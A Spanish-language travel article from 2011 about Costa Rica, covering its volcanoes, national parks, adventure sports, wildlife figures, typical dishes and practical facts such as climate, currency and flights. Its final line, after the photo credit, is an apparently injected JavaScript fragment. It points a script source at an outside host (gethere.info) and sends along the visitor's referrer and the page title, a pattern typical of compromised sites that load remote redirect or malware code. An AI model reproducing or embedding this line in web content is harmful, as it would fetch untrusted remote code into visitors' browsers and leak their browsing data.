Paisaje lunar en Costa Rica

20/04/2011

Normal que en Costa Rica cualquier situación lleve aparejada la expresión “pura vida”. Sirve para dar las gracias, para preguntar qué tal, para mostrar entusiasmo, para saludar a alguien, para despedirte, para sorprenderte, para expresar lo cool que te parece algo… Y así hasta casi el infinito. Es normal porque el país acoge una imponente naturaleza y una alegría y amabilidad desbordante que hace que te sientas feliz desde el primer momento. En sus aproximadamente 51.100 kilómetros cuadrados, que es lo que mide Costa Rica, se encuentra el 5 por ciento de la biodiversidad mundial. Y el país se ha dado cuenta de su importancia y ha dirigido sus pasos hacia un desarrollo sostenible. Selvas, volcanes, mares y montañas como si no hubiera pasado tiempo desde la creación de la Tierra.

Tomemos San José, la capital, como centro de operaciones. Total, en un día uno puede visitar la Costa Pacífica y la Atlántica. El volcán Poás nos hará enmudecer envuelto en niebla. Su cráter principal es uno de los más grandes del mundo, con una hoya de casi dos kilómetros de diámetro y 300 metros de profundidad. ¿Vértigo? Pues el Irazú, en medio de bajísimas temperaturas, no le resultará menos sorprendente: Neil Armstrong, el primer hombre que pisó la Luna, dijo que no hay otro lugar más parecido al astro. ¿Escalofríos? Escuche cómo retumba la actividad del volcán Arenal. Continuando con montañas, es de obligada visita el cerro Chirripó, en la Cordillera de Talamanca, considerada Parque Nacional. Desde su cima y en días claros se pueden otear los dos océanos. Las selvas y bosques tropicales le parecerán de película, pero no envalentone y contrate los servicios de un guía.

La aventura está por todas partes: descendimiento en balsa por los ríos Reventazón o Pacuare, kayaks en la Península de Nicoya y el Golfo Dulce, surf en multitud de arenales y barranquismo en el Parque Nacional Barra Honda, también en Nicoya. Y si le quedan energías, puenting y dormirá como un bebé. No olvidemos que la naturaleza costarricense (o tica, el gentilicio oficioso) tiene hijos.

Las cifras dan respeto: 13.000 especies de plantas, 2.000 de mariposas diurnas y 4.500 nocturnas, 163 de anfibios, 220 de reptiles, 1.600 de peces de agua y 850 de aves. Entre los mejores espectáculos que ofrecen está la arribada de tortugas en Playa Grande, Tamarindo, Ostional y Playa Nancite. Y junto a los placeres de la vista y la adrenalina, no pare de comer: tendrá más de 150 variedades de frutas (mamones, cas, guayaba, tamarindo, zapote…) y platos como el Gallo Pinto (arroz con frijoles), el Casado (arroz, frijoles, plátano maduro, ensalada y carne) o el Tamal (harina de maíz, arroz, carne y hojas de plátanos). De postre, café de Costa Rica. La vida puede ser pura.

Datos útiles:

  • Costa Rica tiene algo más de 4 millones de habitantes.
  • El clima depende de las zonas. En las áreas de Pacífico Central y Pacífico Sur, la época lluviosa tiene lugar entre mayo y noviembre. En el Pacífico Norte y Guanacaste, desde mayo hasta finales de octubre. En el Caribe, de mayo a agosto y de noviembre a diciembre.
  • La moneda es el colón costarricense.
  • Iberia ofrece vuelos a Costa Rica desde Madrid todos los días. Para encontrar los mejores precios, busque en www.iberia.com marcando «soy flexible en fechas» para dar con las mejores combinaciones.

Foto | robnunn

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;